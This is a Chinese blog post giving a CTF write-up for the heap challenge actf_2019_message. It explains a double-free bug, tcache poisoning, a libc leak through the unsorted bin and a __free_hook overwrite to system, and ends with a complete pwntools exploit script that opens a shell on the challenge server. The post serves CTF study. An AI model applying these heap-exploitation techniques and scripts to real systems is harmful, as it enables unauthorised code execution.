actf_2019_message

已于 2022-08-26 01:58:17 修改
阅读量296 收藏 1
点赞数 3
文章标签: 网络安全 python
于 2022-08-26 01:50:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kjdfklha/article/details/126535268
版权

actf_2019_message

最近学习了tcache,在buu上发现了一道很有意思的题
actf_2019_message

检查防护

在这里插入图片描述
看到full relro第一时间想到hook

没有开PIE,极好极好,运行一下看看

在这里插入图片描述

看起来很普通的表单题

静态分析

main

主程序并不复杂,只是四个选项

在这里插入图片描述

sub_400911

在这里插入图片描述
初始化函数

sub_400A3F(选项1)

在这里插入图片描述

出现了第二个匿名常量,不难看出dword_602060是一个存储size和content_ptr的结构体,而dword_60204C则起到一个计数的作用,每次malloc都自增

创建一个结构体,不然用数组看,太费眼。struct界面insert可以创建结构体

在这里插入图片描述

修改一下结构类型

在这里插入图片描述

看起来就变得清爽多了

在这里插入图片描述

选项1没有发现什么特别的地方,接着往下看

sub_400B73(选项2)

在这里插入图片描述

delt函数相比较add函数就出现了大问题,double_free王炸开局,匪夷所思的是,content_ptr没有置零,置零了size

sub_400C40(选项3)

在这里插入图片描述

到这里解释了为啥要置零size了,修改的时候要验证一遍,决绝uaf,edit的过程也是read完成的,没有毛病

sub_400D21(选项4)

在这里插入图片描述

经典show函数,看起来没太大毛病

思路

存在double free,但是需要先泄露libc,show函数配合unsorted bin可以泄露mian_arena,泄露libcbase自然水到渠成

然而此时还没有意识到某些环节出现了问题

解题

交互函数先写好

from pwn import *
context(arch='amd64', os='linux')
context.log_level = 'debug'

DEBUG = 1
if DEBUG:
    r = process('./ctf')
    elf = ELF('./ctf')
    libc = ELF('/so/docker/2.27/64/libc-2.27.so')
else:
    r = remote('node4.buuoj.cn', 29239)
    elf = ELF('./ctf')
    libc = ELF('/so/buu/ubuntu18_64.so')
    

def choice(nu):
    r.sendlineafter('choice: ', str(nu))

def add(content):
    choice(1)
    r.sendlineafter('length of message:\n', str(len(content)))
    r.sendafter('input the message:\n', content)

def delt(idx):
    choice(2)
    r.sendlineafter('you want to delete:\n', str(idx))

def edit(idx, content):
    choice(3)
    r.sendlineafter('you want to edit:\n', str(idx))
    r.sendafter('edit the message:\n', content )

def show(idx):
    choice(4)
    r.sendlineafter('want to display:\n', str(idx))

def debug():
    gdb.attach(r)
    pause()

泄露libc

想先利用unsorted bin泄露个main_arena,遇到第一个坑

for i in range(8):
    add('a'*0x80)
for i in range(6):
    delt(i)
delt(7)
delt(6)

多申请7个chunk喂饱全世界最xx的tcache,最后两个chunk颠倒着释放,防止和topchunk合并

在这里插入图片描述

释放后内存长这样,本想着直接把chunk6申请出来泄露。突然发现问题

在这里插入图片描述

由于delt之后的内存没有置零,add之后新的chunk只能排到后边,也就是说每次free,list的数量就会永久减一,这简直太xx了

这样下去很显然不等申请unsortedbin中的chunk,list就被占满了

可以利用double free控制list,手动置零list,但是这样count和list里的数量就对不上,所以最好的选择是count常量和list同时修改,double_free控制count常量(count常量就在list前0x14位),这样既可以修改count,同时修改list

控制count常量和list
for i in range(2):
    add('a'*0x200)
for i in range(2):
    delt(0)
add(p64(0x60204c).ljust(0x200, '\x00'))
add('a'*0x200)
payload0 = p64(1).ljust(0x14, '\x00') + p64(0x200) + p64(0x60204c)
payload = payload0.ljust(0x200, '\x00')
add(payload)

debug()

首先申请两个chunk,一个用于double free,第二个chunk让count加一,不然没法free chunk0第二次

在这里插入图片描述

然后就是喜闻乐见的double free,目的地址是常量count_60204c,payload是

p64(1).ljust(0x14, '\x00') + p64(0x200) + p64(0x60204c)

覆盖后的内存:

在这里插入图片描述

这里覆盖一个count的地址到chunk0,下次覆盖更加方便,有的师傅可能会发现覆盖的count是1,但是变成了2,覆盖的add也算一次add,所以加1

泄露main_arena

刚才申请不了的unsorted bin现在可以申请了,有了chunk0可以随心所以突破free次数的限制

for i in range(8):
    add('a'*0x80)
for i in range(1, 7):
    delt(i) 
delt(8)
delt(7)
edit(0, payload)	#list清理

先申请八个内存,七个喂饱tcache,剩下一个放到unsorted bins中,当然最后两个chunk依然要颠倒放,不然会和top chunk合并

到这里list又快满了,利用chunk0清空list

chunk7指向unsorted bin时

在这里插入图片描述

利用chunk0清理list后:
在这里插入图片描述

接下就是把所有tcache连着我们需要的unsorted bin申请出来

for i in range(7):
    add('a'*0x80)
add('a'*0x8)

从unsorted bins中取出chunk大有讲究,取出来的chunk的fd一定会被我们覆盖掉,但是bk不会,且bk相对于main_arena也是固定偏移,把fd完全覆盖,打印chunk8就可以连带着把bk打印出来

在这里插入图片描述

在gdb中调试可以看到bk到main_arena偏移为224,但是只要解题步骤一样,调试的偏移放到题目中也不会变,所以可以通过bk算出main_arena地址

main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 224
malloc_hook = main_arena - 0x10
log.info('main_arena: '+hex(main_arena))

在这里插入图片描述

可以由此获取malloc_hook\libcbase\free_hook等更重要的值

libcbase = malloc_hook - libc.sym['__malloc_hook']
free_hook = libcbase + libc.sym['__free_hook']
system = libcbase + libc.sym['system']
binsh = libcbase + libc.search('/bin/sh').next()

getshell

到这里已经可以为所欲为了,利用chunk0部署free_hook,修改成system,部署binsh,只需要free就可以getshell

payload = payload0 + p64(0x8) + p64(binsh) + p64(0x8) + p64(free_hook)
edit(0, payload.ljust(0x200, '\x00'))
edit(2, p64(system))
delt(1)

在这里插入图片描述

修改free_hook后:

在这里插入图片描述

exp

from pwn import *
context(arch='amd64', os='linux')
context.log_level = 'debug'

DEBUG = 0
if DEBUG:
    r = process('./ctf')
    elf = ELF('./ctf')
    libc = ELF('/so/docker/2.27/64/libc-2.27.so')
else:
    r = remote('node4.buuoj.cn', 26913)
    elf = ELF('./ctf')
    libc = ELF('/so/buu/ubuntu18_64.so')
    

def choice(nu):
    r.sendlineafter('choice: ', str(nu))

def add(content):
    choice(1)
    r.sendlineafter('length of message:\n', str(len(content)))
    r.sendafter('input the message:\n', content)

def delt(idx):
    choice(2)
    r.sendlineafter('you want to delete:\n', str(idx))

def edit(idx, content):
    choice(3)
    r.sendlineafter('you want to edit:\n', str(idx))
    r.sendafter('edit the message:\n', content )

def show(idx):
    choice(4)
    r.sendlineafter('want to display:\n', str(idx))

def debug():
    gdb.attach(r)
    pause()

for i in range(2):
    add('a'*0x200)
for i in range(2):
    delt(0)
add(p64(0x60204c).ljust(0x200, '\x00'))
add('a'*0x200)
payload0 = p64(1).ljust(0x14, '\x00') + p64(0x200) + p64(0x60204c)
payload = payload0.ljust(0x200, '\x00')
add(payload)

for i in range(8):
    add('a'*0x80)
for i in range(1, 7):
    delt(i) 
delt(8)
delt(7)
edit(0, payload)

for i in range(7):
    add('a'*0x80)
add('a'*0x8)
show(8)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 224
malloc_hook = main_arena - 0x10
log.info('main_arena: '+hex(main_arena))

libcbase = malloc_hook - libc.sym['__malloc_hook']
free_hook = libcbase + libc.sym['__free_hook']
system = libcbase + libc.sym['system']
binsh = libcbase + libc.search('/bin/sh').next()

payload = payload0 + p64(0x8) + p64(binsh) + p64(0x8) + p64(free_hook)
edit(0, payload.ljust(0x200, '\x00'))
debug()
edit(2, p64(system))
delt(1)

r.interactive()

劳动成果:

在这里插入图片描述
参考文章:
__free_hook劫持
unsorted bin attack
double free

K1d#
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
pwn—actf_2019_message(转载)
INK
08-26 191
pwn
actf_2019_babystack
z1r0的博客
12-31 1305
actf_2019_babystack 查看保护 溢出0x10个字节,大小不够。栈迁移,s的地址都给了,将payload写入s,改ebp和ret为s地址和leave_ret即可。payload前加8个a让rip成功跳转到payload。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node
noxctf2018_grocery_list&&actf_2019_message
doudoudedi
03-17 509
noxctf2018_grocery_list 先是观察函数发现有一个可以泄露栈地址然后通过tcache attack打到栈上泄露libcbase然后再次写入free_hook拿到shell exp: #!/usr/bin/python2 from pwn import * #p=process('./GroceryList') p=remote('node3.buuoj.cn',26988) e...
BUUCTF-PWN-ACTF_2019_message
Rt1Text的博客
07-17 214
除了PIE,其它保护全开,规矩的堆菜单。
buuctf ACTF_2019_message(tcache bin dup / fastbin dup)
qq_36918532的博客
04-19 741
有些图片显示不出来,我懒的在复制粘贴了,可以直接去我笔记里面看 网上的这道题的,大部分的exp都是写的16.04,使用的fastbin double free,但是在buuctf上根本打不通,因为人家都要求了是18.04,,所以这里写了两个版本(均可以打通) buuctf ACTF_2019_message 安全检查:FULL RELRO(got表不可写),GS,NX都开了 菜单题(堆的) 增加函数:判断当前堆指针是否为空,为空就创建 删除函数:一是没有判断该地方是否有值,而是没有将堆指针置空,可能出
actf_2019_actfnote
doudoudedi
06-22 563
思路 通过溢出将topchunk的位置向上提然后申请堆块即可完成一次任意地址写入 exp: #!/usr/bin/python2 from pwn import * #p=process('./ACTF_2019_ACTFNOTE') p=remote('node3.buuoj.cn',26474) elf=ELF('./ACTF_2019_ACTFNOTE') libc=elf.libc def add(size,name,content): p.sendlineafter('$ ','1') p.
actf_2019_babyheap
z1r0的博客
02-16 665
actf_2019_babyheap 查看保护 这里有一个uaf。 这里的堆块还创建一个指向show的地址。 攻击思路: 因为有show的地址,还有uaf。所以可以通过uaf来修改show的地址为system_plt。创建两个0x31大小的堆,此时释放掉再申请两个0x21大小的堆,这个时候就是调用其余一个存放功能的堆块,再加上uaf的存在,将show功能的堆块改为system,将存放conext的功能改到binsh那里,此时调用另一个堆块就相当于调用system("/bin/sh"); from pw
actf_2019_babyheap(uaf)
m0_51251108的博客
11-05 264
actf_2019_babyheap: 一般有时间的就有system 逆向分析:
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6182
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
Jeopardy-Writeups:SniperOJ的CTF挑战比赛
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8254
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何mysql数据导入到mongdb
codemami的博客
05-30 772
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
Python 具体能干什么?
猿小白的博客
05-26 1240
Python 是一种功能强大、用途广泛的编程语言,因其简洁易读的语法和丰富的库生态系统而备受欢迎。
在linux服务器上使用tensorboard,错误记录
最新发布
wwwwzm的博客
05-30 478
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
Pandas03
Bianca427的博客
05-27 1226
聚合计算时新增一列计算最大值与平均值的差值df.groupby('district').agg(最低工资=('salary', 'min'), 最高工资=('salary', 'max'), 平均工资=('salary', 'mean'), 最大值与均值差值=('salary', myfunc)).rename_axis(["行政区"])
ACTF gogogo
09-06
ACTF是指Attack and Defense CTF,是一种网络安全竞赛形式。在ACTF比赛中,参赛队伍需要在规定的时间内攻击对手的系统并保护自己的系统免受攻击。参赛队伍需要在攻防过程中发现漏洞、修补漏洞、攻击对手并保护自己的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值